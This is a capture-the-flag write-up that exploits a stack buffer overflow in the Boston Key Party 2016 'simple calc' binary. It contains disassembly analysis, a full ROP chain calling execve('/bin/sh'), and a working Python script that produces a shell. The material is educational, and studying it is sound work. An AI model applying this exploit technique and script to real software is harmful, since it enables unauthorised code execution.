March 7, 2016
Challenge materials can be found here: http://captf.com/2016/bostonkeyparty/02-simple/
So, initially we got a link to some file. Downloading it and running file on it gives:
calc: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=3ca876069b2b8dc3f412c6205592a1d7523ba9ea, not stripped
So at this point we know that it’s a 64bit ELF binary and it’s statically linked.
I then ran checksec on it to see what protections were enabled.
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH
So the only thing I had to worry about was NX being on. ie, the stack would be marked as non-executable so it wouldn’t be as trivial as somehow putting our shellcode there and returning into it.
However, earlier I found out that the binary was statically linked so hopefully I’d have access to a lot of useful ROP gadgets if I needed them.
Now that I had some initial information about the binary, I decided it was time to take a look at what it does.
I’m not going to describe this part in detail since it just involved me going through the different menu options and just playing with different values.
The interesting things I saw were that there was a minimum and maximum number of operations you could choose at the beginning.
There also seemed to be a restriction on the values you could use in the calculations. It complained when I entered small values and exited.
The last menu option “Save and Exit” also seemed interesting. What could this binary be trying to save? and to where?
Now it was time to look at the disassembly. I’m only going to include the interesting parts here:
From the disasembly of main:
0x00000000004013e9 <+102>: lea rax,[rbp-0x14] ; local var 0x00000000004013ed <+106>: mov rsi,rax ; int* 0x00000000004013f0 <+109>: mov edi,0x494214 ; %d 0x00000000004013f5 <+114>: mov eax,0x0 0x00000000004013fa <+119>: call 0x4084c0 <__isoc99_scanf>
Here we can see that it just reads an integer in via scanf after it asks for the number of calculations.
0x0000000000401409 <+134>: mov eax,DWORD PTR [rbp-0x14] ; num_calc 0x000000000040140c <+137>: cmp eax,0xff 0x0000000000401411 <+142>: jg 0x40141b <main+152> ; if num_calc > 255 then goto Failure 0x0000000000401413 <+144>: mov eax,DWORD PTR [rbp-0x14] 0x0000000000401416 <+147>: cmp eax,0x3 0x0000000000401419 <+150>: jg 0x40142f <main+172>; if num_calc <= 3 continue to Failure Failure: 0x000000000040141b <+152>: mov edi,0x4943f2 0x0000000000401420 <+157>: call 0x408de0 <puts> 0x0000000000401425 <+162>: mov eax,0x0 0x000000000040142a <+167>: jmp 0x401588 <main+517> ... ... 0x0000000000401588 <+517>: leave 0x0000000000401589 <+518>: ret
Essentially what this says is that 4 <= num_calc <= 255.
Next we see:
0x000000000040142f <+172>: mov eax,DWORD PTR [rbp-0x14]; num_calc 0x0000000000401432 <+175>: shl eax,0x2 ; num_calc * 4 0x0000000000401435 <+178>: cdqe ; convert to qword 0x0000000000401437 <+180>: mov rdi,rax ; 0x000000000040143a <+183>: call 0x415050 <malloc> ; allocate num_calc*4 bytes
Here we can see that it allocates
num_calc * 4 bytes where 4 bytes is the size of an integer. This definitely hints that the binary is storing the results of each calculation that we do. Let’s call the allocated memory,
Looking at the rest of it binary, it all seems very repetitive.
All of the operations are pretty much identical except for the instruction(s) for adding, subtracting, dividing and multiplying.
0x000000000040147c <+249>: call 0x401082 <adds> ; call operation function 0x0000000000401481 <+254>: mov eax,DWORD PTR [rbp-0x4] ; i where 0 <= i < num_calculations 0x0000000000401484 <+257>: cdqe 0x0000000000401486 <+259>: lea rdx,[rax*4+0x0]; calculate offset into allocated memory 0x000000000040148e <+267>: mov rax,QWORD PTR [rbp-0x10] ; get base address of allocated memory 0x0000000000401492 <+271>: add rdx,rax ; 0x0000000000401495 <+274>: mov eax,DWORD PTR [rip+0x2c35ed] # 0x6c4a88 <add+8> ; get result stored in global variable 0x000000000040149b <+280>: mov DWORD PTR [rdx],eax ; store result at base+offset.
It goes like this:
1. Call operation function based on menu choice (add, substract, multiply, divide)
2. Calculate where to store memory.
results + 4*i
3. Actually store result:
[results + (4*i)] = result;
That takes care of menu options 1-4. Now to look at option 5 which was labelled “Save and Exit”.
0x000000000040152e <+427>: mov eax,DWORD PTR [rbp-0x14] 0x0000000000401531 <+430>: shl eax,0x2; num_calc * 4 0x0000000000401534 <+433>: movsxd rdx,eax ; num bytes to copy 0x0000000000401537 <+436>: mov rcx,QWORD PTR [rbp-0x10]; int *results 0x000000000040153b <+440>: lea rax,[rbp-0x40] ; destination address 0x000000000040153f <+444>: mov rsi,rcx 0x0000000000401542 <+447>: mov rdi,rax 0x0000000000401545 <+450>: call 0x4228d0 <memcpy> ; copy num_calc*4 bytes from results to the destination address 0x000000000040154a <+455>: mov rax,QWORD PTR [rbp-0x10] 0x000000000040154e <+459>: mov rdi,rax 0x0000000000401551 <+462>: call 0x4156d0 <free> ; attempt to free int *results 0x0000000000401556 <+467>: mov eax,0x0 0x000000000040155b <+472>: jmp 0x401588 <main+517>
Now things become very interesting. Here, the results from our calculations are being copied to a local variable inside of main.
However, the local variable is at
rbp-0x40. That means that it is at most
64 bytes in length. However, we can copy
num_calc * 4 bytes into it where
num_calc can be as large as
255. Therefore we can copy up to
1024 bytes from our results to that location.
BUFFER OVERFLOW FOUND!!!
Given this information, we can calculate that we have to write
80 bytes in order to gain control over
ie. 64 bytes + 8 bytes for the saved frame pointer + 8 bytes for the saved return address.
Let’s test this, keeping in mind that every calculation we do will count for 4 bytes. Therefore we need 20 calculations + 1 more for the save and exit.
root@184b8859c34f:/chall# perl -e 'print "21\n","1\n40\n40\n"x20,"5\n"' | ./calc <Lots of output> => Segmentation fault (core dumped)
Looks good so far.
Let’s do this in GDB / inspect the dump to ensure that we actually have control over RIP.
root@184b8859c34f:/chall# perl -e 'print "21\n","1\n40\n40\n"x20,"5\n"' > input root@184b8859c34f:/chall# gdb -q ./calc Reading symbols from ./calc...(no debugging symbols found)...done. gdb-peda$ run < input Starting program: /chall/calc < input <output> => Program received signal SIGSEGV, Segmentation fault.
OH NO. Seems we don’t have control over
RIP after all. After thinking about this for a minute, the problem becomes obvious. Remember our
int *results from earlier? Since that was located at
RBP-0x10, we’re clobbering the value when trying to overwrite the save return address.
Now, I was already familiar with how
free() works at this point so I knew that clobbering results with a value of
0 would just cause
return and not cause a crash. However, it isn’t hard to deduce this from its disassembly either.
Dump of assembler code for function free: 0x00000000004156d0 <+0>: mov rax,QWORD PTR [rip+0x2ae079] # 0x6c3750 <__free_hook> 0x00000000004156d7 <+7>: test rax,rax 0x00000000004156da <+10>: jne 0x41579a <free+202> 0x00000000004156e0 <+16>: test rdi,rdi ; x = rdi & rdi 0x00000000004156e3 <+19>: je 0x415798 <free+200> ; jump if x==0 ... ... 0x0000000000415798 <+200>: repz ret
The only time
test rdi, rdi would result in the
ZF being set is if
0 initially. Therefore,
free() exits if the argument passed to it is
Armed with this knowledge, let’s try to get control over
I used subtractions with 40 as both operands to get a value of 0 and I used that value repeated for the entire overflow.
root@184b8859c34f:/chall# perl -e 'print "21\n","2\n40\n40\n"x20,"5\n"' > input root@184b8859c34f:/chall# gdb -q ./calc Reading symbols from ./calc...(no debugging symbols found)...done. gdb-peda$ run < input Starting program: /chall/calc < input => Program received signal SIGSEGV, Segmentation fault.
YAY. WE HAVE CONTROL OVER
Now that we have control over
RIP, it’s time to pop a shell and read the flag. We want to use the
execve (0x3b) syscall and we want to execute
Knowing that NX is enabled, the stack isn’t executable and we’re going to have to use ROP.
int execve(const char *filename,const char *const argv, const char *const envp)
execve("/bin/sh", NULL, NULL)
- RDX = 0 : Let envp = NULL
- RSI = 0 : Let argv = NULL
- RDI = addr of “/bin/sh”
- EAX = 0x3b : syscall number
- SYSCALL Instruction
Making RDX = 0
Let’s try to set
When searching for ROP gadgets, a
POP RDX; RET is available @
0x00437a85. Let’s overwrite the saved return address with that.
Let’s picture our stack at the time of overflow right before
ret has executed and we have control over
| | | | | 0x00000000 ; NULL | | 0x00437a85 ; SAVED RET | RSP-->
ret executes, it’ll place
0x00437a85 into RIP and continue execution there. It will then
POP RDX, placing the next value on the stack into
RDX (in this case 0x00000000) and moving
RSP higher up the stack. The
RET instruction following it is then executed, but we haven’t decided what to return to yet. We can place the address that we want to return to right above 0x00000000.
MAKING RSI = 0
Since we’ve set
RDX = 0, let’s set
RSI = 0. Turns out there’s a
POP RSI; RET at
| 0x00000000 ; NULL | | 0x00401c87 ; POP RSI; RET | RSP--> | 0x00000000 ; NULL | | 0x00437a85 ; POP RDX; RET |
Therefore when the
POP RDX executes, it’ll then place
POP RSI is then executed, making
RSI = 0. The following
RET instruction is then executed. What shall we return into next?
MAKING RDI = addr of “/bin/sh[NULL]”
This part ended up being a little more complicated than the others.
I could easily place
/bin/sh[NULL] onto the stack. However, how would we get its address into
I looked for a gadget containing
MOV RDI, RSP.
0x00492468, there was a
MOV RDI, RSP; CALL R12 gadget. This would have to do. As for placing
/bin/sh[NULL] on the stack, it was important to keep in mind that Intel uses little endian so
/bin/sh[NULL] which normally be
0x2f62696e2f736800 would be
| 0x0068732f6e69622f ; "/bin/sh[NULL]| | 0x00492468 ; MOV RDI,RSP; CALL R12 | RSP -> | 0x00000000 ; NULL | | 0x00401c87 ; POP RSI; RET | | 0x00000000 ; NULL | | 0x00437a85 ; POP RDX; RET |
Given that a
CALL R12 was going to be executed, this means that I’d have to place the next address I wanted to jump to into
R12 before we got to that point. I needed a
POP R12; RET gadget and I found one at
0x00400493. It’s important to keep in mind that
CALL causes the address of the next instruction to be pushed onto the stack as the saved return address, essentially subtracting
RSP, which messes up our layout a little. In addition to that, we never executed a
RET meaning that
RSP is another additional
8 behind where we want it to be.
Therefore, we want the address in
R12 to point to a sequence of instructions which increases
RSP by 16. However, when searching for a
ADD RSP, 0x10 ROP gadget, I couldn’t find one. However, I did find
ADD RSP, 0x8; RET and
ADD RSP, 0x18; RET gadgets.
I could use the first one twice or I could use the second one and just place 8 dummy bytes onto the stack. I chose the latter @
| NEXT RETURN ADDRESS | | 0x00000000 ; DUMMY BYTES | | 0x0068732f6e69622f ; "/bin/sh[NULL]| | 0x00492468 ; MOV RDI,RSP; CALL R12 (clobbered) | RSP -> | 0x00000000 ; NULL | | 0x00401c87 ; POP RSI; RET | | 0x00000000 ; NULL | | 0x00437a85 ; POP RDX; RET | I inserted the POP R12 gadget at the start. | 0x00416af0 ; ADD RSP,0x18; RET | | 0x00400493 ; POP R12; RET |
Finally we have
RDI = addr of
/bin/sh/[NULL] and our stack is in a usable state.
MAKING EAX = 0x3b
This was fairly simple. I found a
POP RAX; RET gadget at
| NEXT RETURN ADDRESS | | 0x0000003b ; execve syscall number | | 0x0044db34 ; POP RAX; RET | RSP-> | 0x00000000 ; DUMMY BYTES | | 0x0068732f6e69622f ; "/bin/sh[NULL]| | 0x00492468 ; MOV RDI,RSP; CALL R12 (clobbered) | | 0x00000000 ; NULL | | 0x00401c87 ; POP RSI; RET | | 0x00000000 ; NULL | | 0x00437a85 ; POP RDX; RET | | 0x00416af0 ; ADD RSP,0x18; RET | | 0x00400493 ; POP R12; RET |
EXECUTING THE SYSCALL INSTRUCTION
At this point, we have everything set up perfectly. All we need to do now is execute the
SYSCALL instruction and our ROP chain should be complete and this should be able to give us a shell.
Luckily for us, there are a lot of them, one being at
| 0x004648e5 ; SYSCALL | | 0x0000003b ; execve syscall number | | 0x0044db34 ; POP RAX; RET | | 0x00000000 ; DUMMY BYTES | | 0x0068732f6e69622f ; "/bin/sh[NULL]| | 0x00492468 ; MOV RDI,RSP; CALL R12 (clobbered) | | 0x00000000 ; NULL | | 0x00401c87 ; POP RSI; RET | | 0x00000000 ; NULL | | 0x00437a85 ; POP RDX; RET | | 0x00416af0 ; ADD RSP,0x18; RET | | 0x00400493 ; POP R12; RET |
WOOHOO ROP CHAIN COMPLETE
Now by abusing the subtraction operation in my python script, I was able to generate a sequence of operations that would result in the stack looking like what we’ve created.
The script really is terrible and hacky :p Ignore that.
def erev(val): rev_val =  for i in range(0,len(val),2): rev_val = val[i:i+2] + rev_val return rev_val def generate_input(val): if val[0:2] == "0x": val = val[2:] val = val.zfill(16) val = list(val) rev_val = erev(val) first_half = ''.join(erev(rev_val[0:8])) second_half = ''.join(erev(rev_val[8:])) first_half = int(first_half, 16) second_half = int(second_half, 16) print 2 print first_half+40 print 40 print 2 print second_half+40 print 40 print 43 for i in range(0,9): generate_input('00') generate_input('0x000000400493') #pop r12; ret generate_input('0x00416af0') # add rsp, 0x18; ret generate_input('0x00437a85') # pop rdx; ret generate_input('0000000000') # NULL generate_input('0x000401c87') #pop rsi; ret generate_input('0000000000') # NULL generate_input('0x00492468') # mov rdi, rsp; call r12; generate_input('0x0068732f6e69622f') # "<0>hs/nib/" generate_input('00000000') #NULL generate_input('0x0044db34') #pop rax; ret generate_input('0x3b') #59 (execve) generate_input('0x004648e5') #syscall;ret print 5
Let’s test it.
root@eb386f7913f0:/chall# python pwn.py > shell.txt root@eb386f7913f0:/chall# cat shell.txt - | ./calc <Lots of output> => whoami root echo "WOOHOO WE CAN READ THE FLAG NOW" WOOHOO WE CAN READ THE FLAG NOW
And it works :D